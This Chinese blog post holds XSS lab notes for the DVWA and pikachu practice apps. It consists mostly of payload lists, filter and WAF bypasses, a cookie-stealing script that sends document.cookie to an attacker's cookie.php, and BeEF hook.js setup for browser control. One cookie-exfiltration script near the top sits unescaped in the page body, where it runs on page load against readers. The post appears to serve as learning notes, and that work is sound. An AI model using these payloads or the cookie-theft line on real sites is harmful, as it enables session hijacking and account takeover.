<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>xss漏洞 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="http:&#x2F;&#x2F;192.168.2.103&#x2F;DVWA-master&#x2F;DVWA-master&#x2F;vulnerabilities&#x2F;xss_r&#x2F;?name&#x3D;root# document.location&#x3D;&#39;http:&#x2F;&#x2F;192.168.2.66&#x2F;cookie.php?cookie&#x3D;&#39;+document.cookie  xss攻击标签&gt;可以用&#x2F;&#x2F;代替。()可以用&#96;&#96;代">
<meta property="og:type" content="article">
<meta property="og:title" content="xss漏洞">
<meta property="og:url" content="http://example.com/2024/01/16/xss%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="http:&#x2F;&#x2F;192.168.2.103&#x2F;DVWA-master&#x2F;DVWA-master&#x2F;vulnerabilities&#x2F;xss_r&#x2F;?name&#x3D;root# document.location&#x3D;&#39;http:&#x2F;&#x2F;192.168.2.66&#x2F;cookie.php?cookie&#x3D;&#39;+document.cookie  xss攻击标签&gt;可以用&#x2F;&#x2F;代替。()可以用&#96;&#96;代">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117104554284.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117104721692.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117104955818.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117105047971.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117142730958.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118111404167.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118111902086.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118111914212.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118112112536.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118112339721.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118113103518.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118113507395.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118113410601.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118154519871.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118155227755.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118155509594.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118161439532.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118161537511.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118103456152.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118104121021.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118104843193.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118105407130.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119101224069.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119101650171.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119101741733.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119102228594.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119103252926.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119103938729.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119104035588.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119104334965.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119104353011.png">
<meta property="article:published_time" content="2024-01-16T06:52:44.000Z">
<meta property="article:modified_time" content="2024-02-29T11:28:23.183Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117104554284.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/plugin/bganimation/bg.css">

  

  <link href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css" rel="stylesheet" type="text/css">
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://avatars0.githubusercontent.com/u/20333903?v=3&amp;s=460">
    <h2 class="author">John Doe</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>65</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>1</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-xss漏洞" class="wow slideInRight article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2024/01/16/xss%E6%BC%8F%E6%B4%9E/" class="article-date">
  <time class="post-time" datetime="2024-01-16T06:52:44.000Z" itemprop="datePublished">
    <span class="post-month">1月</span><br/>
    <span class="post-day">16</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      xss漏洞
    </h1>
  

        <div>
          
          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p><a target="_blank" rel="noopener" href="http://192.168.2.103/DVWA-master/DVWA-master/vulnerabilities/xss_r/?name=root#">http://192.168.2.103/DVWA-master/DVWA-master/vulnerabilities/xss_r/?name=root#</a></p>
<script>document.location='http://192.168.2.66/cookie.php?cookie='+document.cookie</script>

<h3 id="xss攻击"><a href="#xss攻击" class="headerlink" title="xss攻击"></a>xss攻击</h3><p>标签&gt;可以用&#x2F;&#x2F;代替。()可以用&#96;&#96;代替。</p>
<h4 id="常用语句："><a href="#常用语句：" class="headerlink" title="常用语句："></a>常用语句：</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br><span class="line">&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br><span class="line">&lt;svg onload=alert(1)&gt;</span><br><span class="line">&lt;h5&gt;1&lt;/h5&gt;</span><br><span class="line">&lt;span&gt;1&lt;/span&gt;</span><br><span class="line">&lt;script&gt;console.log(1);&lt;/script&gt;</span><br><span class="line">&lt;a href=javascript:alert(1)&gt;</span><br><span class="line">&#x27;onclick = &#x27;alert(1)&#x27;</span><br></pre></td></tr></table></figure>

<p>绕waf</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload &lt;details open ontoggle=testdemo&gt;</span><br><span class="line">payload &lt;input type=submit formaction=javascript:alert`1`&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=https://xsspt.com/VBAhTu&gt;&lt;/script&gt;</span><br><span class="line">&lt;a href=javascript:alert(1)&gt;xss&lt;/a&gt;</span><br><span class="line">&lt;svg onload=alert(1)&gt;</span><br><span class="line">&lt;img src=1 onerror=alert(1)&gt;</span><br><span class="line">&lt;img src=https://www.baidu.com/img/bd_logo1.png onload=alert(1)&gt;</span><br><span class="line">&lt;details open ontoggle=alert(1)&gt;</span><br><span class="line">&lt;body onload=alert(1)&gt;</span><br><span class="line">&lt;M onmouseover=alert(1)&gt;M</span><br><span class="line">&lt;iframe src=javascript:alert(1)&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onload=alert(1)&gt;</span><br><span class="line">&lt;input type=&quot;submit&quot; onfocus=alert(1)&gt;</span><br><span class="line">&lt;input type=&quot;submit&quot; onclick=alert(1)&gt;</span><br><span class="line">&lt;form&gt;&lt;input type=&quot;submit&quot; formaction=javascript:alert(1)&gt;</span><br></pre></td></tr></table></figure>

<p>过滤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- 空格被过滤 --&gt;</span><br><span class="line">&lt;img/src=&quot;1&quot;/onerror=alert(1)&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- 双写绕过 --&gt;</span><br><span class="line">&lt;iimgmg src=1 oonerrornerror=aimglert(1)&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- 大小写绕过  --&gt;</span><br><span class="line">&lt;iMg src=1 oNerRor=alert(1)&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- 利用eval() --&gt;</span><br><span class="line">&lt;img src=1 onerror=&quot;a=`aler`;b=`t(1)`;eval(a+b);&quot;&gt;</span><br><span class="line">&lt;img src=1 onerror=eval(atob(&#x27;YWxlcnQoMSk=&#x27;))&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- 利用location --&gt;</span><br><span class="line">&lt;img src=1 onerror=location=&#x27;javascript:%61%6C%65%72%74%28%31%29&#x27;&gt;</span><br><span class="line">&lt;img src=1 onerror=location=&#x27;javascript:\x61\x6C\x65\x72\x74\x28\x31\x29&#x27;&gt;</span><br><span class="line">&lt;img src=1 onerror=location=&quot;javascr&quot;+&quot;ipt:&quot;+&quot;%61%6C%65%72%74%28%31%29&quot;&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- 括号被过滤 --&gt;</span><br><span class="line">&lt;img src=1 onerror=&quot;window.onerror=eval;throw&#x27;=alert\x281\x29&#x27;;&quot;&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- onerror=被过滤 --&gt;</span><br><span class="line">&lt;img src=1 onerror     =alert(1)&gt;</span><br><span class="line">&lt;img src=1 onerror</span><br><span class="line">=alert(1)&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- 属性被转换为大写 --&gt;</span><br><span class="line">&lt;img src=1 onerror=&amp;#x0061;&amp;#x006c;&amp;#x0065;&amp;#x0072;&amp;#x0074;&amp;#x0028;&amp;#x0031;&amp;#x0029;&gt;</span><br><span class="line">    </span><br><span class="line">&lt;!-- 编码后被检测 --&gt;</span><br><span class="line">&lt;img src=1 onerror=&amp;#x00000061;&amp;#x006c;&amp;#x0065;&amp;#x0072;&amp;#x0074;&amp;#x0028;&amp;#x0031;&amp;#x0029;&gt;</span><br><span class="line"></span><br><span class="line">&lt;!-- 上面的绕过是比较常见的姿势了，下面将结合实例讲XSS的绕过&gt;</span><br></pre></td></tr></table></figure>



<h3 id="pikachu中XSS漏洞"><a href="#pikachu中XSS漏洞" class="headerlink" title="pikachu中XSS漏洞"></a>pikachu中XSS漏洞</h3><h4 id="一、反射性XSS（get）"><a href="#一、反射性XSS（get）" class="headerlink" title="一、反射性XSS（get）"></a>一、反射性XSS（get）</h4><p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117104554284.png" alt="image-20240117104554284"></p>
<p>首先确认页面是否存在xss漏洞，我们输入一些特殊的字符，””&lt;&gt;111，点击提交，看是否被过滤掉了，看返回图：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117104721692.png" alt="image-20240117104721692"></p>
<p>发现没有过滤，所以我们简单的输入一个JS，按我们的猜想，它是能弹窗的。</p>
<p>因为限制了长度，需要更改。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117104955818.png" alt="image-20240117104955818"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117105047971.png" alt="image-20240117105047971"></p>
<h4 id="二、反射性XSS（post）"><a href="#二、反射性XSS（post）" class="headerlink" title="二、反射性XSS（post）"></a>二、反射性XSS（post）</h4><p><strong>get方式的XSS漏洞更加容易利用，一般利用的方式是将带有跨站脚本的URL伪装后发给目标。而post方式是以表单方式提交的，无法直接使用URL方式来进行攻击</strong></p>
<p>可以尝试登入进去。、</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240117142730958.png" alt="image-20240117142730958"></p>
<h4 id="三、存储型XSS"><a href="#三、存储型XSS" class="headerlink" title="三、存储型XSS"></a>三、存储型XSS</h4><p>存储型xss漏洞跟反射型形成的原因一样，不同的是存储型xss下攻击者可以将脚本注入到后台存储起来，构成更加持久的伤害，因此存储型xss又称为“永久型”xss。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118111404167.png" alt="image-20240118111404167"></p>
<h4 id="四、DOM型XSS"><a href="#四、DOM型XSS" class="headerlink" title="四、DOM型XSS"></a>四、DOM型XSS</h4><p>DOM是什么？<br>通过JavaScript，可以重构整个HTML文档。你可以添加、移除、改变或重新排版。要改变页面的某个东西，JavaScript就需要获得对HTML文档所有元素进行访问的入口，这个入口，连同对HTML元素进行添加、移动、改变或移除的方法和属性，都是通过文档对象模型来获得的（DOM）</p>
<p><strong>所以，你可以把DOM理解为一个一个访问HTML的标准编程接口。</strong></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118111902086.png" alt="image-20240118111902086"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118111914212.png" alt="image-20240118111914212"></p>
<p><strong>这里，我们知道 输入的字符串通过DOM的方式拼接到了a的标签中</strong></p>
<p>将其闭合,点击下方按钮。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;onclick = &#x27;alert(1)&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118112112536.png" alt="image-20240118112112536"></p>
<h4 id="五、DOM型XSS-X"><a href="#五、DOM型XSS-X" class="headerlink" title="五、DOM型XSS-X"></a>五、DOM型XSS-X</h4><p>一样是闭合</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118112339721.png" alt="image-20240118112339721"></p>
<p>这个输入是从浏览器的URL中获取的，形成漏洞的输入点是在URL的参数中。</p>
<h4 id="六、XSS盲打"><a href="#六、XSS盲打" class="headerlink" title="六、XSS盲打"></a>六、XSS盲打</h4><p>盲打不是一种漏洞类型，是一个攻击场景。</p>
<p>就是说攻击者在不知道有没有XSS存在的情况下，疯狂的输入XSS代码在留言、feedback之类的地方，尽可能的多尝试XSS存在的方式，叫盲打。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118113103518.png" alt="image-20240118113103518"></p>
<p>不会有弹窗，因为并不在前端，是在后台，我们模拟管理员登录后台：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118113507395.png" alt="image-20240118113507395"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118113410601.png" alt="image-20240118113410601"></p>
<h4 id="七、XSS绕过"><a href="#七、XSS绕过" class="headerlink" title="七、XSS绕过"></a>七、XSS绕过</h4><p><strong>过滤-转换：</strong></p>
<p> 1.前端限制绕过，直接抓包重放，或者修改html前端代码；</p>
<p>2.大小写，比如：<code>&lt;SCRIPT&gt;aLeRT(111)&lt;sCRIpt&gt;；</code></p>
<p>3.拼凑：<code>&lt;scri&lt;script&gt;pt&gt;alert(111)&lt;/scri&lt;/script&gt;pt&gt;</code>；</p>
<p>4.使用注释进行干扰：<code>&lt;scri&lt;!--test--&gt;pt&gt;alert(111)&lt;/sc&lt;!--test--&gt;ript&gt;;</code></p>
<p><strong>过滤-编码：</strong></p>
<p>核心思路：后台过滤了特殊字符，比如<code>&lt;script&gt;</code>标签，但该标签可以被各种编码，后台不一定会过滤。当浏览器对该编码进行识别时，会翻译成正常的标签，从而执行。</p>
<p><strong>大小写绕过</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scRipt&gt;alert(1)&lt;/scrIpt&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118154519871.png" alt="image-20240118154519871"></p>
<h4 id="八、XSS之htmlspecialchars绕过"><a href="#八、XSS之htmlspecialchars绕过" class="headerlink" title="八、XSS之htmlspecialchars绕过"></a>八、XSS之htmlspecialchars绕过</h4><p><strong>关于htmlspecialchars()函数：htmlspecialchars()函数把预定义的字符转换为了HTML实体。</strong></p>
<p>预定义的字符是：<br>1、&amp; （和号）成为 &amp;<br>2、” （双引号）成为 ”<br>3、’ （单引号）成为 ‘<br>4、&lt; （小于）成为 &lt; &gt; （大于）成为 &gt;</p>
<p>在源代码里我们发现输入的被进行了编码，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;onclick = &#x27;alert(1)&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118155227755.png" alt="image-20240118155227755"></p>
<p><strong>XSS常见防范措施：</strong></p>
<blockquote>
<p><strong>总的原则：输入做过滤，输出做转义。</strong></p>
<p><strong>·过滤：根据业务需求进行过滤，比如输入点要求输入手机号，则只允许输入手机号格式的数字。</strong></p>
<p><strong>·转义：所有输出到前端的数据都根据输出点进行转义，比如输出到html中进行htnl实体转义，输入JS里面的进行js转义。</strong></p>
</blockquote>
<h4 id="九、XSS之href输出"><a href="#九、XSS之href输出" class="headerlink" title="九、XSS之href输出"></a>九、XSS之href输出</h4><p><strong>点击文字后弹窗，这是因为输入在a标签的href属性里面，可以使用JavaScript协议来执行JS</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(123)</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118155509594.png" alt="image-20240118155509594"></p>
<h4 id="十、XSS之JS输出"><a href="#十、XSS之JS输出" class="headerlink" title="十、XSS之JS输出"></a>十、XSS之JS输出</h4><p>根据提示输入tmac</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118161439532.png" alt="image-20240118161439532"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&lt;/script&gt;&lt;script&gt;alert(&#x27;1&#x27;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118161537511.png" alt="image-20240118161537511"></p>
<p>‘&gt; <a href=javascript:alert(1)></p>
<p>‘ onclick &#x3D; ‘alert(1)’</p>
<p>“onclick &#x3D; alert(1) type&#x3D;”button”</p>
<h4 id="xss获取cookie"><a href="#xss获取cookie" class="headerlink" title="xss获取cookie"></a>xss获取cookie</h4><p>我们可以更改cookei登入对方的账号。</p>
<p>1.kali中开启apache</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service apache2 start</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118103456152.png" alt="image-20240118103456152"></p>
<p>2.cd到apache服务地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /var/www/html #apache的默认服务地址</span><br></pre></td></tr></table></figure>

<p>4、查看apache的服务所有者和所有者</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -axu | grep apache</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118104121021.png" alt="image-20240118104121021"></p>
<p>5、更改cookie.txt文件的所有者为apache服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chown www-data:www-data cookie.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118104843193.png" alt="image-20240118104843193"></p>
<p>6、构建xss漏洞加载cookie.php的恶意链接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;document.location=&#x27;http://192.168.2.77/cookie.php?cookie=&#x27;+document.cookie&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>可以使用url编码将js语句编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.59/pikachu/vul/xss/xss_reflected_get.php?message=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%2e%35%39%2f%63%6f%6f%6b%69%65%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e</span><br></pre></td></tr></table></figure>

<p>点击后可以在kali中cookie.txt中找到cookie</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat cookie.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240118105407130.png" alt="image-20240118105407130"></p>
<h3 id="beef"><a href="#beef" class="headerlink" title="beef"></a>beef</h3><p>在kali自带的浏览器里下载beef。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119101224069.png" alt="image-20240119101224069"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119101650171.png" alt="image-20240119101650171"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install beef-xss</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119101741733.png" alt="image-20240119101741733"></p>
<p>如果出错可以加–fix-missing</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install beef-xss --fix-missing</span><br></pre></td></tr></table></figure>

<p>更新kali</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt update</span><br></pre></td></tr></table></figure>

<p>下载好后会自动进入beef页面。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119102228594.png" alt="image-20240119102228594"></p>
<p>username是beef，password是下载beef时设置的密码。</p>
<p>在win10的php根目录下打开beef.php。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=&quot;http://&lt;IP&gt;:3000/hook.js&quot;&gt;&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119103252926.png" alt="image-20240119103252926"></p>
<p>在主机登入<code>192.168.2.100/beef.php</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119103938729.png" alt="image-20240119103938729"></p>
<p>就可以控制电脑</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119104035588.png" alt="image-20240119104035588"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119104334965.png" alt="image-20240119104334965"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240119104353011.png" alt="image-20240119104353011"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/01/16/xss%E6%BC%8F%E6%B4%9E/" data-id="clrmsspnx0003j0u4h4iqg6be" class="article-share-link">分享</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/01/17/%E7%BD%91%E9%A1%B5%E7%8A%B6%E6%80%81%E7%A0%81/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          网页状态码
        
      </div>
    </a>
  
  
    <a href="/2024/01/10/upload%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6-%E4%BD%A0%E4%B8%8A%E4%BD%A0%E9%A9%AC%E5%91%A2/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">upload上传文件</div>
    </a>
  
</nav>

  
</article>



</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Hexo</h1>
    <h2 class="blog-subtitle"></h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://avatars0.githubusercontent.com/u/20333903?v=3&amp;s=460">
    <h2 class="author">John Doe</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>65</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>1</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="http://github.com/ShanaMaid" target="_blank" title="Github">
          Github
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友情链接</h2>
      
        <a class="hvr-bounce-in" href="http://blog.shanamaid.top/" target="_blank" title="ShanaMaid">
          ShanaMaid
        </a>
      
    </div>
  </div>
</div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2023 - 2024 John Doe<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a target="_blank" rel="noopener" href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
    </div>
    
  </div>
</footer>
    </div>
    

